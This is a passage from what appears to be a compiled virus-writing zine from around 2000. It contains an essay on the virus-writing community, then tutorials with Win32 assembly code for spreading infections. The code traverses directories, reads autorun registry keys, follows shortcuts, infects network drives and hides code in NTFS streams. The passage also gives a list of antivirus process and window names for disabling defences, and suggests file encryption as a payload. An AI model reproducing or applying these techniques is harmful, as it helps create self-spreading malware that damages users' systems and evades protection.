best groups around have no hierarchy at all. Maybe one guy who centralizes the
material for the zine, and that's all. Every attempt to mimick the real world (a company
for example, with different departments) is condamned to be considered as extremely
lame and poorly productive; and i don't even talk about the irony to see newcomers in
the underground trying very quickly to imitate the mechanisms of the normal world.
Didn't you come in the vx world in part because it looked different?

That's why everybody laugh when a group creates this peak of extreme ridiculousness,
a "Public Relation" department. It's clearly a way to admit "we have nothing to say, but
anyway, there is a guy in charge of that". It's a way to show to everybody your
nombrilist and egocentric view of the scene, because you think every journalist around
is going to be interested by your new group, you will be submerged by interview
requests, users will ask you about your viruses, you will do the first page of the New
York Times. In your dreams.

- Delicate conclusion

I sometimes think that the Vx scene is mainly composed by boring IRC teens, who don't
really know what life (i mean the real life) is all about, who are not interested in
learning, but in posing as some elite lordz of Darkness. It may be partially true, or
partially wrong, depends on how you look at it. Anyway, i don't really care. A minority
of people are interesting enough, as human beings, or coders, or both, and that's the
only important thing, at least for me. I don't care about all the microscopic IRC wars,
the anecdotic group fights, the childish agressivity. Maybe that's because i'm a bit old,
but i think i've learned how to filter important things from the background noise. And
not just in Vx world. Try to do the same, you will see, life is easier.

- Epilogue

People involved in the virus community - i don't like the word "scene", this is not a
theater, and there is nobody looking at us, another nombrilist deformation of reality,
even in the terms used - always say that it's worsening with the years passing. More and
more script kiddies and less and less die-hard asm coders who can spend six hours on a
routine just to optimize it by saving two bytes. I don't think it's true. The problem being
that people cannot separate their personal history from the global picture (that's not
limited to the Vx world, of course). If you try to look at it with some distance, you will
see that the vx community looks the same than five or ten years ago. Not in term of
techniques used, of course, but in term of personalities. New people pops in, old people
quit, as an eternal cycle. In these two extreme populations, and in the large group of
active vxers which sits in the middle, the proportion between posers who are just driven
by an ego trip (ph33r M3!), and the really interesting guys who want to discover new
techniques or possibilities, even through a long learning process, yes, this proportion
stays always the same through the years. You have stupid old schoolers and stupid
newbies who think they are Elvis, and you have interesting old schoolers and interesting
newbies who want to learn, always. If you're reading this and you think you are part of
the "scene", just think about in which category you fit best. But be aware that the image
you have of yourself may not be the image that your Vxers colleagues have of you. If
you're not satisfied with it, think about what you can do to change it and maybe to gain
some respect. I'm not talking just about just improving your technical skills. Some
people try to be creative with their limited knowledge (me, for example), other run
websites, publish useful databases, are active collectors, help newcomers by writing
tutorials, code other things than pure viruses, whatever. You can, at last, ameliorate
your behaviour when interacting with other people. In other words: try to be mature.

I will terminate here and return in my cave. Hope this helps.

Spanska - 20 September 2000

PS: Post a message in alt.comp.virus if you want to talk about that - I have no mail.
[copyquedalle: steal this text, modify it, sign it with your name, wipe your ass with it, i don't fucking care]
http://kickme.to/Cryptic/
fly.to/alpina

Faster Spreading
or
What to include in your virus to make it spread more effective

by SnakeByte [SnakeByte@kryptocrew.de]

Here we go, please notice that it is illegal to spread viruses, and all
this information is completely theoretical, or for testing purpouses
in a controlled environment.

I just wrote one Windows-Virus so you will see here just few
lines of code.. ( interesting ones I think but maybe not very optimized ;)

The task of a virus is to spread ( Payload is just a side-effect ).


So we need some tricks ( besides infection *g* ) to make our virus
spread, as fast as possible.

Ok, when a virus arrives on a clean system, it will infect some files, sure .. ;)
But if something went bad, we just get some files in the current directory
and the victim deletes it, because he does not like the infected app.. :(

Not very good, so what to do to avoid this situation ?

Here are 6 ideas what we can do :

1.) Infect as many file-types as possible.


2.) Try to drop over archives
3.) Parse Directory's
4.) Use the Registry
5.) Follow Links
6.) Worming

Ok, let's take a closer look at each of these methods:

1.) Infect as many file-types as possible.

If you are macro coder, you should try to infect as many documents which
support macro as possible ( DOC, CDR, DOT, PPT, XLS.. ).
Same for the assembler coders, there are a lot of file formats which can
be infected in Win32: PE-EXE, SCR (same as PE-EXE), DLL, HLP and VXD.
Maybe you should try to code a hybrid which is able to infect Binaries on
the one hand and macro on the other hand, this will offer you a much higher
chance of finding files for infection. In VDat there is a description for how
to infect most file types. I think adding 200-400 Bytes to your virus and
being able to infect another type is a very good deal. The more files you
infect the more likely you get your virus around.

2.) Try to drop over archives

Nowadays nearly every file you download somewhere or get send by


someone is zipped or packed with another archiver ( RAR, ACE ..)
It is possible to infect the files in the archives too. It also offers
you a small protection against AV programs, because AVP for example
does not scan archives by default. Read Unknown Mnemonix Tutorials
about archive infection for more information about how to do this.
So if you infect an archive you archive two goals ( stupid sentence ;P )
the might not get detected, it is possible that someone uploads the archiv
to a website and your virus get's lots of hits..

3.) Parse Directory's

Ok, now we infect a lot of files, but still all are in the same directory,
so we need to change and parse directory's. What we should infect nearly
always are the windows and the system directory's, cause they include a lot
of files, which are highly used. Use the GetWindowsDirectory and GetSystemDirectory
API's to retrieve their names. Then you should parse directory's to find more
files to infect. Otherwise we would have infected the current, the win and sys
directory, but nothing else, which is not very useful ( how often do you dcc a
friend your calc.exe ? *g* ) There are two ways of directory parsing, the one
is upwards the other downwards. If you travel downwards ( like cd.. in dos), you
would normally not find a lot of files, so traveling upwards is recommended.
This can be simply done with a FindFirstFile / FindNextFile Loop.
The current directory is assumed to be root on one of the drives.
The FindNextFileProc and FindFirstFileProc are procedures that call the
matching API's ( I think you'll also use them several times )
The RandomNR procedure just generates a random number in dx.

************************

ParseFolder:
call InfectCurDir ; infect the current directory
cmp [ebp+InfCounter],0 ; check if we reached the number of files we want to infect
jbe EndParsing ; we infected enoug ? ok, leave !

lea esi, [ebp+Folders]


Call FindFirstFileProc
inc eax
jz EndParsing ; If there are no directorys we return
dec eax ; otherwise we save the handle

GetOtherDir:
; first of all we check if this
; is a valid directory
mov eax, dword ptr [ebp+WFD_dwFileAttributes]
and eax, 10h ; if not we get the next
jz NoThisOne ; one

lea esi, [ebp+WFD_szFileName]


cmp byte ptr [esi], '.' ; we will not parse into . or ..
je NoThisOne ; directorys

call RandomNR ; generate a random Number, if it is 1


dec edx ; we infect the directory, otherwise
; we go on searching
jz ParseNewDir ; we get this directory

NoThisOne:

call FindNextFileProc ; Find next directory


test eax, eax
jnz GetOtherDir

EndParseDir2: ; we close the search - Handle


mov eax, dword ptr [ebp+FindHandle]
push eax
call dword ptr [ebp+XFindClose]

EndParsing: ; we just return


ret

ParseNewDir: ; we got a direcory, let's change to it


; and infect it.. *eg*

; close Find-Handle
mov eax, dword ptr [ebp+FindHandle]
push eax
call dword ptr [ebp+XFindClose]

; set new directory


lea esi, [ebp+WFD_szFileName]
push esi
call dword ptr [ebp+XSetCurrentDirectoryA]

jmp ParseFolder ; parse it again !

Folders db '*.',0

************************

4.) Use the Registry

The Windows Registry also offers us a lot of information about what files
or directorys we should infect to be sure that our virus gets activated
again and does not sleep inside some never used files. You need to load
an additional DLL in your virus, but i think this is ok. If you can't load
the DLL, just jmp over the registry routines and infect fewer files.
I think you all know what the windows registry is or ? For those who don't:
the registry replaces the old ini files which have been used in older versions
of windows ( 3.1 ). The registry information is stored in the User.dat and
System.dat. To view or change the registry use 'regedit.exe', which is delivered
with every version of windows.

The following API's are neseccairy to access the registry, they are all
inside the ADVAPI32.DLL !

RegOpenKeyEx - Opens a registry key


RegCloseKey - Closes an open key
RegCreateKey - Creates a key
RegEnumKeyEx - Enumerates subkeys
RegQueryValueEx - Retrieves a value
RegEnumValue - Enumerates values

Ok, let's see some source how to get a value from registry :
This little piece of code gets the Startmenue Folder

************************

lea esi, RegHandle


push esi
push 001F0000h ; complete access
push 0h ; reserved
lea esi, SubKey
push esi
push 80000003h ; HKEY_USERS
call RegOpenKeyExA

test eax, eax ; if we failed opening the key, we return


jnz WeFailed

; let's get the value


lea esi, BufferSize
push esi
lea esi, Buffer
push esi
lea esi, ValueType
push esi ; Type of Value
push 0 ; reserved
lea esi, Value
push esi ; ValueName
mov eax, RegHandle
push eax ; Reg-Key Handle
call RegQueryValueExA

mov eax, dword ptr [RegHandle]


push eax
call RegCloseKey

WeFailed:

ret

SubKey db '.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',0


Value db 'Start Menu',0
ValueType dd 0h ; Type of registry Value
BufferSize dd 7Fh ; size of buffer
Buffer db 7fh dup (0)

************************

Buw what can we use the registry for ? Ok let's see some interesting values :

In these Keys are the autostarted files :


HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runonce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce

Here are the paths of all installed apps, what about parsing this key ? ;)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths

Several standard directories :


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup

Shared files ( infect them "two for the price of one" *g* )
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLLs

Registered Help Files ( if your virus infects them, here you get a whole bunch of )
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Help

Computer Network Name ( nice value for slow poly )


HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\ComputerName\ComputerName

A list of installed files (vxd, exe, dll, hlp, pif,.. ) :


HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\InstalledFiles
5.) Follow Links

Windows uses LNK-Files to create shortcuts for often used files, so you
don't need to copy a 8 MB huge file to your desktop. If you find such
a Link, you should check if it points to a file you are able to infect,
if so.. don't wait and drop your code over it.
Very useful becomes this if you parse the Start-Menue or the desktop *eg*

Here is some example code from my Win32.DDoS how to do this, it does not
work with NT-LNK Files :( There is also an API we can use for this, but I
never figured it out, but I think this is not that much code, so we can
include it.

I assume you retrieved the LNK-File with the help of FindFirstFile


/ FindNextFile and the information is stored in the WIN32_FIND_DATA
Structure, I also assume that the file is mapped and the base
address in MapAddress.

************************
; first of all, we check for the file
; mark, it is a single 'L' followed by a zero

mov esi, dword ptr [ebp+MapAddress]


cmp word ptr [esi], 'L' ; check for sign
jne NoLNK ; if it is no LNK File we close it

; Let's make a check for the file-size,


; I don't think that there are any shortcuts
; bigger than 1 MB, just to be sure.

cmp dword ptr [ebp+WFD_nFileSizeLow] , 0400h


ja NoLNK

; get the start addy in esi, and and the size

mov esi, dword ptr [ebp+MapAddress]


mov ecx, dword ptr [ebp+WFD_nFileSizeLow]
xor edx, edx
add esi, ecx ; we start checking at the end of the file
; for a valid filename in it
CheckLoop:
cmp byte ptr [esi], 3ah ; we detect a filename by the 2 dots ( 3ah = : )
jne LNKSearch ; in the Drive
; for example C:\whatever\blah.exe
; we search for the ':'

inc edx ; there are 2 times 2 dots, when checking from


cmp edx, 2d ; the end of the LNK, we need the 2.nd
je PointsDetected ; the first : is inside the path ( without filename )
; so we skip them

LNKSearch: ; go on searching
dec esi ; we search until we found the dots or
loop CheckLoop ; searched the entire file ( size in ecx )
; I don't want to create a SEH .. ;)
; if we end here, we did not find the two dots.. :(
NoLNK:

ret ; return to search more files...

PointsDetected: ; we found the drive ( two dots ... *g* )


; esi points to them, now we need to check
; the name..

cmp byte ptr [esi+1], 0h ; check if we got an entire path or just a


je NoLNK ; single drive
; this can happen sometimes with NT or 2k
; shortcut files, so we better avoid them

PointsDetected2: ; now we search the starting point of the name


dec esi ; by searching for a zero
cmp byte ptr [esi], 0h
je NameDetected

loop PointsDetected2 ; ecx still takes care, that we don't


; search too far..

jmp NoLNK ; nothing found ? return..

NameDetected: ; ok, esi points now to the name of the file


inc esi ; you can now open this file and check if it is
; something you are able to infect
; it's just that easy, but very effective, if you
; do this in the right folders,.. ;)
************************

6.) Worming

To make sure you don't stay on a single computer you should try to spread over
networks. One way are IRC-Worms, which sends your virus to other chatting people.
To my mind this is the easiest way to worm around.
Another way is to check all drives and if you have access to a network drive,
infect there some files.

************************

push offset Buffer ; offset of the buffer


push 60h ; buffer-lenght
call GetLogicalDriveStrings

cmp eax, 0 ; did we fail ?


je StopThis

lea esi, Buffer

WhatDrive:
push esi
call GetDriveType
cmp eax, DRIVE_REMOTE ; we got a network drive
jne NoNetwork

; esi still contains the offset of


; the root dir on the drive
call infectDrive ; so we infect it.. ;P

NoNetwork:
Call GetNextZero ; place esi after the next zero
; ( searching from esi onwards )
cmp byte ptr [esi],0
jne WhatDrive ; if we searched all drives we
; end here, otherwise we check the type
StopThis:
ret
Buffer db 60h dup (?) ; I don't know that many ppl with 20+
; Drives so this buffersize should be
; big enough ;)

************************

Another way is, like the 911-Dialer does, to scan IP ranges when the user
is online for non-pass protected Netbus PC's. If you have access, just upload
your virus ;)
Finally, you can worm with the help of E-Mails, infect a program and send
it with the help of Visual Basic Script or with the MAPI Commands around. This
is maybe the fastest and most efficient way of spreading, cause the snowball
effect is very huge. But if you use VBS and Outlook, please keep in mind that it
is worse enough that your virus just spreads in one OS, if it also relies on
two frontends ( OE and VB Scripting Host ) it becomes even worse ;)

Hope this little text helps at least some peoples, I enjoyed writing it, and hope
you do so too while reading it... ;)

cu SnakeByte
AV-List 13.07.2000 ( by SnakeByte [ SnakeByte@kryptocrew.de] )

What is the problem when using anti-AV tricks in a Virus ? The most of those
you find in tutorials are simply outdated ( Think of the f-prot loop trick, which
is still used ;) But in windows you have more possibilitys to get rid of the AV's
You can stop the execution of files ( under win9x and 2k ), you can delete files,
you can prevent files from being executed ( if you're ring-0 ) and you can
close windows of other applications. So on this little list you find all you need for this.

I looked for such a list because I wanted to know which files are used by
AV's and which windows we should close to disable them ! But i found none,
luck for you :
Now I got a CD in my hands with several Shareware AV's and I collected several
others on the net ( god i love this flatrate ;) So I took myself some spare
time and made this little listing.

I just have Win95 so I can just give information about the Win9x Versions.
If you have another Version of a program, which is listed here, installed or
informations about a program which is not listened here, please contact me,
so I can expand this list and keep it actual.

**************************************************************
Anti-Viral Toolkit Pro ( AVP )

Files:
*.avc Virus Database
( The Normal EXE Files seem to start the _ ones )
_avp32.exe AVP Avtiviral scaner shell
_avpcc.exe AVP Control Centre Application
_avpm.exe AVP Monitor
avp32.exe AVP Scanner ( Main File )
avpcc.exe AVP Control Centre Application
avpm.exe AVP Monitor
avpdos32.exe AVP Scanner for DOS
avptc32.exe AVP Scanner for DOS
exec.exe unknown
avpupd.exe AVP Update ( leeches new *.avc files )

Window-Names:
AVP Monitor
AntiViral Toolkit Pro
AVP Updates

**************************************************************
AntiVir 9x

Files:
Antivir.vdf Virus Database
AVE32.exe Scanner ( DOS )
Avgctrl.exe Monitor
Avnt.exe Scanner ( DOS )
Avrep32.exe Report Viewer
AVSCHED32.exe Scan Scheduler
AVWIN95.exe Scanner
Avwupd32.exe Update

Windows:
H+BEDV AntiVir Guard/9x
AVWUPD32

**************************************************************
Dr. Solomon Virus Scan

Files:
scan.dat Virus Database ( assumed )
AVConsol.exe Scheduler
Bootscan.exe MBR-Scanner ( DOS )
ECEngine.exe Download Engine
FindViru.exe Scanner ( DOS )
scan32.exe Scanner
scrscan.exe ScreenSaver + Scanner
VSCAN40.exe Desktop for the Scanner
vshwin32.exe Monitor
Webscanx.exe Webscanner

Windows:
vsstat
Avconsol
Webscanx
Vshwin

**************************************************************
F-Prot for WIndows

Files:
*.def Virus Database
Expert.exe Help & Information ( DOS )
FP-Win.exe Scanner
f-stopw.exe Monitor
Vir-help.exe Help-File ( DOS )

Windows:
FP-WIN
F-PROT für Windows ( German Version )
F-STOPW Version 5.06c

**************************************************************
F-Prot 3.07B

Files:
*.def Virus Database
F-prot.exe Scanner ( DOS )

**************************************************************
F-Secure Anti-Virus for Windows 95

Files:
*.avc Virus Database ( uses same as AVP ! )
DVP95.exe F-Secure Gatekeeper
DVP95_0.exe F-Secure Gatekeeper
F-agnt95.exe F-Agent
F-prot95.exe F-Secure Anti-Virus Launcher

Windows:
F-Secure Anti-Virus for Windows 95
F-Secure Anti-Virus
F-agnt95
Dvp95

**************************************************************
G-Data AntiVirenKit ( German Program )

Files:
*.avc Virus Database ( Same as AVP ! )
AvkServ.exe Scan Server
AckWin32.exe Scanner
notstart.exe creates Bootdisks

Windows:
AntiVirenKit 9

**************************************************************
InoculateIT Personal Edition:

Files:
Vet95.exe Scanner
VetTray.exe Monitor
AutoDown.exe Update
Rescue.exe Dos-Scanner

Window-Names:
InoculateIT Personal Edition
InoculateIT Real-Time Protection Status
vettray
AutoDownload

**************************************************************
Norman Virus Control Win 9x

Files:
Claw95.exe Monitor
Claw95cf.exe Configures Monitor
Normist.exe Smart Behaviour Blocker
Nvc95.exe Scanner
Nupgrade.exe Internet Upgrade
NVCbin.def Virus Database
NVCMacro.def Virus Database

Windows:
Norman Virus Control for Windows 95/98
Cat's Claw v4.80

**************************************************************
Norton Anti Virus ( NAV )

Files:
navapw32.exe Monitor
NavLu32.exe Update
Navw32.exe Scanner

Windows:
navpw32
Norton AntiVirus
**************************************************************
Sophos Anti-Virus for Win95:

Files:
VDL.dat Virus Database ( assumed )
Sweep95.exe Scanner

Window-Names:
Sophos Anti-Virus - SWEEP

**************************************************************
Trend PC-Cillin 98

Files:
IOMon98.exe Monitor
PCCWin98.exe Scanner

Windows:
Trend PC-cillin 98
Iomon98

**************************************************************
RAV 7

Files:
*.vdm Virus Database
Jedi.exe Scan Scheduler
Monitor.exe Monitor
rav7win.exe Scanner
rav7.exe Scanner ( DOS )

##############################################################
Are Anti-Virus Companies Criminals?

SnakeByte

Hi, maybe you start wondering about this headline, but I will tell you some facts which
brought me to this question ;)

The first thing is, that in several countries there is a law against the ownership of viral
sourcecodes and binaries. But this also includes, that it is forbidden to share these
things. What do AV'ers do ? They share their files so they all are able to include common
viruses into the databases. In addition to this, they have a lot of viral binaries and
disassemblys in their labs, to analyze viruses.

The next fact is not related to a country-specific law, but to international copyright. Most
of the software for MS-DOS and Windows ( which are the favourite platforms for viruses ), is
commercial. What does this mean ? You got to pay for the software you use. If you copy it
completely or parts of it, whithout paying for the code, you break international copyright
laws. Heh, what does Kasperski and the others ask me for ? I shall send them files which I
suspect to be infected ? I can't believe this, they ask me to commit a crime ! I don't know
how other countries handle this, but here in germany if you make another person commit a
crime it is nearly as worse as committing the crime on your own.

Last time I installed something commercial on my PC, I was so bored, that I read the
disclaimer ( you know the window with lots of text you normally just see for a short time,
cause you directly press >next< ). I was wondering when I saw the little paragraph about
reverse engineering. If you own this program, you agree to the terms, that you will never
ever reverse this program. ( If you don't own the program you break the copyright I talked
few lines above about *g* ). Heh, how do the Anti-Virus researchers analyze viruses ? They
reverse the virus, to get knownlegde about how the virus works. Whoah, to do this, they also
need to disasm the infected program. Another law they break. I really don't think that they
just start the file to infect some goats, if they would, they get in danger that new
hardware attacks destroy their systems ;)

Another thing is that several Anti-Virus Companies start to work on Scanners, which work on
mail-servers to stop outgoing viruses. The mail will not be delivered. Due to the fact, that
a most virus scanners can scan compressed files and so on, there is no easy way for a normal
user to send a virus to his favourite AV Company, if the webserver he uses has one of these
scanners running and the scanner has the virus inside its database. Ok, why is this so
criminal ? They exclude smaller AV-Companies by this from the market. I for myself write a
simple, free Anti-Trojan Tool. How should I receive submissions from peoples which want tu
support my work ? It is impossible and therefore I can not longer work on my product. By
this, they use their nearly-monopol like place to get rid of concurrents. This is illegal,
as you see on the current proceedings against Microsoft.

What if we consider viruses to be an art ? In a way the author created something unique,
which may be assumed to be an artwork like a book or a painting ( If you look at abstract
artwork, nearly everything may be considered to be art *g* ) What about the destruction of
art ? Nearly everywhere this is illegal or at least against the ethics ( Just think about
the burning of books by the germans during the WW2 ) So this might be another crime they
commit.

What if we would place a copyright in our software ? Something like: "You can freely
distribute this program, as long as you do not change anything. Disassembling and the
forwarding to the Anti-Virus Community is forbidden. This program is protected by
international law. It is just meant for analyzing artificial intelligence on controlled
environments. It is also strictly forbidden to place this program on a non controlled
environment and place it into the wild.. bla bla" Just use their laws, to forbid them
analysing our creations. If you see the virus in a AV-Database you know they have broken
this law and you can take them to the court... ;)

Ok Mr. Kaspersky go and get some good lawyers ;)


Some Tipz & trix for Win2k

1. Introduction
I just wanted to write an article about NTFS5. But I am reading a lot of
documentation about Win2k and I found there many functions and sequences that
could be very usefull for us, virus coders. So i decided to write some tipz
and trix that anybody could use. I hope I succeeded.
btw It's my first english written article so pls be patient. My english sux
so if you don't know what something means, just contact me.
And now we can begin ...

2. NTFS5
I think you all expected this:) And i also read on virus.cyberspace.sk that
english version of my article for Igi is requested. I won't exactly translate
what i wrote there becoz it wasn't for coders. This will be :)

2.1. Streams
Streams is not a new feature of NTFS5 and it was implemented in NTFS since the
very beginning of WinNT(version 3.1) but it has been downplayed by Micro$oft.
In Win2k the position of Streams is much better. And there also exists the first
virus that uses Streams. It's of course mine and Benny's/29a Win2k.Stream. I
think ya all have heard about it becoz of big medial success. It's an very easy
and simple virus with a good idea I think. First we heard about Streams from a
man called GriYo/29a (heya and thx man!) on meeting in Brno. And then when Benny
came to me for some days we decided to write our first common virus (and my
first). It was really funny becoz we coded through the nite and very lately we
didn't even know what we are typing :) There also existed a version of
Win2k.Stream with polymorfic name of stream! But next day when we woke up and
talked about it in the pub we decided to write it as simple as possible. And I
think we succeeded - the comment is longer than the whole code XD.
First we'll look what Streams exactly are and then we'll talk more about our
virus.

On filesystems such as FAT, FAT32 and others exists only one unnamed stream.
What do ya think it is? Exactly! The file alone. But on NTFS there exist also
others (data) streams with a name. The name begins with ':' to indicate that it's
a named stream (part of file) and pastes together with filename (the unnamed
stream). Look at this:

We have a file file.txt. It is also the unnmed stream. We would like to create
a new stream within the file file.txt. We want to name it "RAT" for example. So
we simply add ':' before stream name and paste it to file name. So now we have
somewhere in the buffer this: "file.txt:RAT". And now there's nothing easier than
just use CreateFile(A|W) to create our stream. If creation succeed you will
get a handle that you can uses as it would be a normal file (it is exactly a normal
file ...).

Well we have a stream within the file but we forgot its name :) Any solution?
Yeah there is one. It's not so comfortable as it should be but there is. For
our needs we'll need a function called BackupRead that can be found in
kernel32.dll.

Look what MSDN says:

BOOL BackupRead(
HANDLE hFile, // handle to file or directory
LPBYTE lpBuffer, // read buffer
DWORD nNumberOfBytesToRead, // number of bytes to read
LPDWORD lpNumberOfBytesRead, // number of bytes read
BOOL bAbort, // termination type
BOOL bProcessSecurity, // process security options
LPVOID *lpContext // context information
);
For our purposes we can ignore such thingiez as security and context. hFile is
handle to file we want to enumerate streams. lpBuffer should point to a structure
called WIN32_STREAM_ID.

WIN32_STREAM_ID struc
DWORD dwStreamId;
DWORD dwStreamAttributes;
QWORD Size;
DWORD dwStreamNameSize;
WCHAR cStreamName[ANYSIZE_ARRAY];
WIN32_STREAM_ID ends

The first bytes of this structure represent the header of each stream. Then
begins the name of the stream and after the name there is the content of stream.
To enumerate all the streams, you just need to loop until BackupRead returns
False. Just look at the code snippet:

; in ebx - file handle to enumerate streams


enumerate_streams:
push offset lpcontext
push 0
push 0
@pushvar <dd ?>
push 20
push offset buffer
push ebx
call BackupRead ; read the stream header
xchg eax, ecx
jecxz end_enumerate_streams ; error ?
push offset lpcontext
push 0
push 0
@pushvar <dd ?>
push dword ptr [buffer+16] ; push stream_name_size
push offset buffer+20 ; stream_name_size store to buffer+
push ebx ; header_size
call BackupRead
xchg eax, ecx ; error ?
jecxz end_enumerate_streams
; Now we have in buffer+20 the stream_
; name in Unicode. Its length is
; [buffer+16] ...
push offset lpcontext ; becoz BackupRead loox at file and its
@pushvar <dd 0> ; streams as it would be on file we must
@pushvar <dd 0> ; seek after stream content.
push dword ptr [buffer+12]
push dword ptr [buffer+8]
push ebx
call BackupSeek
xchg eax, ecx ; error ?
jecxz end_enumerate_streams
jmp enumerate_streams ; go on with another stream_name ...
end_enumerate_streams:

Well i think that this is all you should know about streams for the beginning.
Just make some more coding with it and i think you will become more familiar
with it and you will use it in the future. Remember the words from Kaspersky/AVP:
Stream companion is a new breaktrough infection which is very hard to detect!
Just make some more wrinkles to AVers ...

2.1.1. Win2k.Stream
And now something more about our babe. After the execution tries to find via
FindFirst&FindNextFile find victimz to infect. It infectz only *.exe files in
current directory (there were no reasons to spread it). The infection worx as
follows:

first it chex if the file is compressed (viz. next chapter)


then it creates a temp file and copies the main stream to it
copies virus_body to main_victim_stream
moves tempfile to stream <victim_file>:STR
compresses the file

so after infection the file loox as this: (This are pictures from AVP :))

File before infection File after infection

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³°°°°°°°°°°°°°°°°°°°³ ³°°°°°°°°°°°°°°°°°°°³
³°°°°°°°°°°°°°°°°°°°³ ³°°° main stream°°°°³
³°°°°°°°°°°°°°°°°°°°³ ³°°° virus body°°°°°³
³°°°°main stream°°°°³ ³°°°°°°°°°°°°°°°°°°°³
³°°°°°°°°°°°°°°°°°°°³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³°°°°program body°°°³ ³°°°°°°°°°°°°°°°°°°°³
³°°°°°°°°°°°°°°°°°°°³ ³°additional stream°³
³°°°°°°°°°°°°°°°°°°°³ ³°°°°°° :STR °°°°°°°³
³°°°°°°°°°°°°°°°°°°°³ ³°°°°°°°°°°°°°°°°°°°³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³±±±±±±±±±±±±±±±±±±±³ ³±±±±±±±±±±±±±±±±±±±³
³±±service streams±±³ ³±±service streams±±³
³±±±±±±±±±±±±±±±±±±±³ ³±±±±±±±±±±±±±±±±±±±³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

then it tries to find next file etc. At the end it just runs via CreateProcess
the <victim_file>:STR stream where is victim_body. When the victim ends it just
invokes ExitProcess and ends. If any error occures it displays following text:

"Win2k.Stream by Benny/29A & Ratter"


"This cell has been infected by [Win2k.Stream] virus!"

and ends. This is also a payload on FAT, FAT32 and others filesystems that do
not support streams. And that's all. Simple ain't it?

2.2. Compression and encryption


We also as first used in our babe NTFS ability to compress files. It is
transparent for application so it is a great way how to reduce disk free space
decreasing after infection occures. If we want to compress file we must call
file_system driver via DeviceIoControl with the rite IoControlCode ... look
at this code snippet from Win2k.Stream and also from my Win2k.Purple (but
the first who did this was Benny/29a in his Win32.HIV. On our mini-meeting he
decided that we will use it in Win2k.Stream first ...)

FSCTL_SET_COMPRESSION equ 9 shl 16 or 3 shl 14 or 16 shl 2

xor eax,eax
push eax
@pushvar <dd ?>
push eax
push eax
push 4
@pushvar <dd 1> ;default compression
push FSCTL_SET_COMPRESSION
push ebx ;NTFS compress it =
call DeviceIoControl ;mark as already infected
; = and save disk space :)

and now what MSDN says:

BOOL DeviceIoControl(
(HANDLE) hDevice, // handle to file
FSCTL_GET_COMPRESSION, // dwIoControlCode operation
NULL, // lpInBuffer; must be NULL
0, // nInBufferSize; must be zero
(LPVOID) lpOutBuffer, // output buffer
(DWORD) nOutBufferSize, // size of output buffer
(LPDWORD) lpBytesReturned, // number of bytes returned
(LPOVERLAPPED) lpOverlapped // OVERLAPPED structure
);

I think that it is clear. And also simple to implement to your virus. Just do it!

Next thingie is Encryption. It can be easyly used by calling functions


EncryptFile and DecryptFile :). I think that it could be aplied as a payload
becoz if you encrypt on the machine with Win2k a file then only the user who
encrypted the file has access to the file. After encyption of some files there
can be very good chaos on the machine :)

BOOL EncryptFile(
LPCTSTR lpFileName // file name
);

BOOL DecryptFile(
LPCTSTR lpFileName, // file name
DWORD dwReserved // reserved; must be zero
);

I think i'm repeating myself but - easy to implement, easy to use ...

2.3. Sparse files


I dunno if anyone finds use for sparse files in virus coding but i found this
as a very nice feature of NTFS5 so i would like to talk about it here. Have you
ever imagined how much space must be wasted in databases in which most of the
file is null (free records)? A lot of :) And here comes a solution for such
applications. Sparse files. (sounds like a promote of M$ :)) We as programmers
can define where in the file lie such holes (with nulls) and say it to the
filesystem. Filesystem will just store to disk datas which by which we say that
are not null ... code snippet will show more:

BOOL DeviceIoControl(
(HANDLE) hDevice, // handle to a file
FSCTL_SET_SPARSE, // dwIoControlCode operation
NULL, // lpInBuffer; must be NULL
0, // nInBufferSize; must be zero
NULL, // lpOutBuffer; must be NULL
0, // nOutBufferSize; must be zero
(LPDWORD) lpBytesReturned, // number of bytes returned
(LPOVERLAPPED) lpOverlapped // OVERLAPPED structure
);

FSCTL_SET_SPARSE equ 9 shl 16 or 2 shl 14 or 49 shl 2


FILE_BEGIN equ 0

push 0
push 0
push CREATE_ALWAYS
push 0 ; create file SparseFile
push 0
push GENERIC_WRITE
@pushsz "SparseFile"
call CreateFileA
xchg eax, ebx
xor eax,eax
push eax
@pushvar <dd ?>
push eax
push eax
push eax
push eax ; Sign this file as a SparseFile
push FSCTL_SET_SPARSE
push ebx
call DeviceIoControl
push FILE_BEGIN
@pushvar <dd 8>
push 0 ; Move filepointer to 32GigaBytes
push ebx ; (hyea Gig :))
call SetFilePointer
push ebx ; SetEndOfFile ==
call SetEndOfFile ; fill with nulls to 32 gigz
push ebx
call CloseHandle

This code snippet will create a file which size is 32GB! But acutally the real
size is null :) Nice aint it ? And how to let the filesystem know that we have
sparse in our file? Here's a prototype of function that we can use ...

BOOL DeviceIoControl(
(HANDLE) hDevice, // handle to a file
FSCTL_SET_ZERO_DATA, // dwIoControlCode operation
(LPVOID) lpInBuffer, // pointer to FILE_ZERO_DATA_INFORMATION
(DWORD) nInBufferSize, // size of input buffer
NULL, // lpOutBuffer; must be NULL
0, // nOutBufferSize; must be zero
(LPDWORD) lpBytesReturned, // number of bytes returned
